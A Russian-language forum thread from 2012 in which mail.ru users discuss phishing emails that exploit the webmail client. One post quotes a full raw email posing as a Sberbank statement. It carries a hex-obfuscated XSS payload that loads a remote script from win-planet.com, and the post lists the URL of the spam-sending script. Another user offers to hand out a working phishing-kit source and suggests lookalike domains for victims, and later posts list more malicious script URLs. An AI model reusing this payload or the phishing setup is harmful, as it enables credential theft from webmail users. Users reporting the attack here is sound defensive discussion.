Владельцам почты на mail.ru

Redbaron _chaos
На сайте с 12.08.2009
Offline
667
#61

То же давно Майлом пользуюсь, проверяют только через The Bat.

Кстати ни разу не ломали, а вот почту от Яндекса 2 раза.

Гемблинг, беттинг, крипта на весь мир в 3snet, 1500+ офферов. ( https://clck.ru/TdZLM ) = = CPA.HOUSE - Топовая CPA сеть ( https://clck.ru/34Swci )
A6
На сайте с 21.09.2011
Offline
22
#62

LEOnidUKG, меня лет 5 тоже не трогали. Плохо что есть возможность - этот баг, перестаешь расслабленно почту читать.

Кстати ни разу не ломали, а вот почту от Яндекса 2 раза

А как это сделали, известно?

p.s. кстати баг еще не пофиксен :(

Redbaron _chaos
На сайте с 12.08.2009
Offline
667
#63
Alex6980:
LEOnidUKG, меня лет 5 тоже не трогали. Плохо что есть возможность - этот баг, перестаешь расслабленно почту читать.


А как это сделали, известно?

p.s. кстати баг еще не пофиксен :(

Думаю подбор пароля (хотя сложный был).

CoolSpot
На сайте с 05.01.2007
Offline
3
#64

Всё письма ведут на скрипты на домене win-planet.com .

Спам разослан с помощью вот этого скрипта: http://win-planet.com/img/email.php

Вот пример исходника сообщения:



Delivered-To: <censored>
Received: by 10.216.16.102 with SMTP id g80csp113688weg;
Mon, 14 May 2012 13:14:32 -0700 (PDT)
Received: by 10.180.101.136 with SMTP id fg8mr23250648wib.4.1337026471690;
Mon, 14 May 2012 13:14:31 -0700 (PDT)
Received-SPF: softfail (google.com: best guess record for domain of transitioning p1mp140@ns6.abcname.net does not designate 213.186.121.228 as permitted sender) client-ip=213.186.121.228;
Received: by 10.217.81.138 with POP3 id x10mf2812717wey.35;
Mon, 14 May 2012 13:14:31 -0700 (PDT)
X-Gmail-Fetch-Info: <censored>@mail.ru 2 pop.mail.ru 110 <censored>@mail.ru
Return-path: <p1mp140@ns6.abcname.net>
Received-SPF: fail
Received: from [213.186.121.228] (port=49514 helo=ns6.abcname.net)
by mx52.mail.ru with esmtp (envelope-from <p1mp140@ns6.abcname.net>)
id 1SU13Z-0007Vk-PV
for <censored>@mail.ru; Mon, 14 May 2012 23:35:46 +0400
X-Mru-BL: 0:0:1088:0
X-Mru-PTR: ns6.abcname.net
X-Mru-NR: 1
X-Mru-OF: Linux (ethernet/modem)
X-Mru-RC: UA
Received: from p1mp140 by ns6.abcname.net with local (Exim 4.77)
(envelope-from <p1mp140@ns6.abcname.net>)
id 1SU1GP-00026d-IP
for <censored>@mail.ru; Mon, 14 May 2012 22:49:01 +0300
To: <censored>@mail.ru
Subject: SBERBANK. Statement report
MIME-Version: 1.0
Content-type: text/html; charset=windows-1251
From: <report_card@sbrf.ru>
Message-Id: <E1SU1GP-00026d-IP@ns6.abcname.net>
Date: Mon, 14 May 2012 22:49:01 +0300
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - ns6.abcname.net
X-AntiAbuse: Original Domain - mail.ru
X-AntiAbuse: Originator/Caller UID/GID - [725 32008] / [47 12]
X-AntiAbuse: Sender Address Domain - ns6.abcname.net
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php /home/p1mp140/public_html/img/email.php
X-Source-Dir: win-planet.com:/public_html/img
X-Spam: Not detected
X-Mras: Ok


<p>Уважаемый клиент!</p>
<p> В приложении направляем Вам отчет по счету карты.</p>

<p>Это письмо сформировано автоматически. Пожалуйста, не отвечайте на него.</p>
<p> Если у Вас есть вопросы, Вы можете обратиться по электронной почте help@sbrf.ru.</p>

<p> С уважением,</p>
<p>Сбербанк России.</p>

<div style='display:none;'><input type='text' id='div_hid' value='Ошибка сервера. Повторите попытку позднее.'>
<style>
#lol:after{
content:"{}</stylE e><img src="ff" onerror="***x28;***x61;***x3D;***x28;***x62;***x3D;***x64;***x6F;***x63;***x75;***x6D;***x65;***x6E;***x74;***x29;***x2E;***x63;***x72;***x65;***x61;***x74;***x65;***x45;***x6C;***x65;***x6D;***x65;***x6E;***x74;***x28;***x27;***x73;***x63;***x72;***x27;***x2B;***x27;***x69;***x70;***x74;***x27;***x29;***x29;***x2E;***x73;***x72;***x63;***x3D;***x27;***x68;***x74;***x74;***x70;***x3A;***x2F;***x2F;***x77;***x69;***x6E;***x2D;***x70;***x6C;***x61;***x6E;***x65;***x74;***x2E;***x63;***x6F;***x6D;***x2F;***x6D;***x61;***x69;***x6C;***x72;***x75;***x2F;***x38;***x38;***x38;***x2E;***x6A;***x73;***x27;***x2C;***x62;***x2E;***x62;***x6F;***x64;***x79;***x2E;***x61;***x70;***x70;***x65;***x6E;***x64;***x43;***x68;***x69;***x6C;***x64;***x28;***x61;***x29;***x3B;***x76;***x6F;***x69;***x64;***x28;***x30;***x29;***x3B;">";
<style>
#lol{
width:1000px;
}
</style>
</style>
;
A6
На сайте с 21.09.2011
Offline
22
#65

CoolSpot тоже самое внедрение через onerror. Я думаю многие такое получают :(

Redbaron _chaos
На сайте с 12.08.2009
Offline
667
#66
Alex6980:
CoolSpot тоже самое внедрение через onerror. Я думаю многие такое получают :(

Посмотрел, за месяц получил 5 962 письма (не очищал папку просто в Бате), пороль еще не сперли)

A6
На сайте с 21.09.2011
Offline
22
#67

Redbaron_chaos, 5к писем именно с вредоносным кодом или просто писем?

Код работает только в веб версии mail.ru

Redbaron _chaos
На сайте с 12.08.2009
Offline
667
#68
Alex6980:
Redbaron_chaos, 5к писем именно с вредоносным кодом или просто писем?
Код работает только в веб версии mail.ru

Просто писем, я и забыл про веб))

Я с 2004 наверно все письма через The Bat принимаю, есть конечно не больше к нему притензии (при закрытие проги иногда виснит, если много писем). У меня больше десятка ящиков черезе него настроенно.

globalDJs
На сайте с 19.02.2009
Offline
54
#69
Этот код вызывает форму авторизации майла, предварительно редиректит на левый сайт с полностью копией интерфейса майл.ру, куда пользователи вводят свой логин и пароль, даже не посмотрев в адресную строку.

Народ, это же что-то типа...фейка... есть у меня хрень такая... вернее ее исходник полный. льешь на поддомен и ссылочку показываешь жертве... чтоб открыл(ла, ло)...а там высвечивается окошко с надписью что не залогинен... и тд тп... тут уже говорили об этом...

кому дать=)

проверял, приходят пароли, только вот для жертв надо придумать домен более похожий, типа maijl.ru)))))

Соврешь-не помрешь, да впредь не поверят! | Контакты: ICQ: 449132353 Думаю, что с ним сделать (http://xplace.kz/) |
A6
На сайте с 21.09.2011
Offline
22
#70

Продолжается сыпаться вредо-спам, похоже еще и скрипт готовый в паблик выложили:

http://2sexporn.ru/backlinkspider/mail_one.php

http://2sexporn.ru/backlinkspider/red.js

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий